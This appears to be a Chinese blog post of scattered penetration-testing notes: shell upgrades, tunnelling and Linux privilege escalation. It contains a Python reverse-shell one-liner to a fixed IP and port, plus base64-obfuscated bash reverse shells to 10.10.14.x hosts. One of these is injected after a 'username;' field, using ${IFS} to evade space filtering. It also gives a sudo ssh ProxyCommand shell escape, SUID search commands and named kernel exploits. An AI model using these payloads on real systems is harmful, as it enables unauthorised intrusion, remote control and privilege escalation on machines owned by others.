零散知识点

python pty

python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);subprocess.call(["/bin/bash", "-i"])'

python -c "import pty;pty.spawn('/bin/bash')"

 

切换到bash,使用python创建pty后使用 ctrl+z 将pty调度后台,然后输入  stty raw -echo 再输入 fg 即可通过上下方向键获取shell历史记录且不用被 ctrl+C 断开,然后设置变量 export TERM=xterm

 

简易文件服务器

#!python
import sys, http.server
port= sys.argv[1] if len(sys.argv) > 1 else 80
http.server.HTTPServer(('', port), RequestHandlerClass=http.server.SimpleHTTPRequestHandler).serve_forever()

 

密码破解网站

  • www.cmd5.com
  • crackstation.net

 

反弹shell
反弹shell利用方式 - 芝士粉子 - 博客园 (cnblogs.com) www.cnblogs.com/zsfz/p/11265734.html

 

shell 中不许出现空格,可使用base64编码 +  `` 结合特殊空字符 ${IFS} 或{echo,"xxx"}方式:

`{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41OS8xMDI4IDA+JjEK}|{base64,-d}|{bash,-i}`
username;`echo${IFS}"cm9vdEAxMTAuMTEwLjExMC4xO2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuODkvODAwMCAwPiYxOwo="|base64${IFS}-d|bash;`



内网穿透

# ssh
ssh -L 0.0.0.0:1080:127.0.0.1:1080 user@1.1.1.1    # 本地端口转发,访问本机1080的流量转发到1.1.1.1的1080端口
ssh -R 192.168.56.110:80:1.1.1.1:80 user@1.1.1.1   # 反向代理,访问对方80端口的流量通过本机转发到192.168.56.110:80,这个地址要是本机能访问的才行
ssh -CqTnN -f -D 0.0.0.0:1080  user@ip             # 本地开启socks5代理,流量通过对方转发到目的地
# 参数 -CqTnN 用于不启动shell、压缩数据;-f 参数将其放入后台运行

 

提权

  • linux 内核漏洞
    • CVE-2022-0847-dirtypipe
    • cve-2021-4034 linux内核漏洞,好用,c编译 http://cloud.tencent.com/developer/article/1945253
  • 使用脚本扫描:linpeas.sh linux-exploit-suggester.sh windows-exp-sugxx.ps1
  • 查找有SUID SGID的可执行文件:
    find / -type f  -perm -04000 -o -perm -02000 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
  • sudo提权:通过 sudo -l 查看是否有sudo命令,sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x 
  • 查找root权限定时任务,crontab、pspy64
  •  

 

posted @ 2022-12-17 14:22  某某人8265  阅读(26)  评论(0编辑  收藏  举报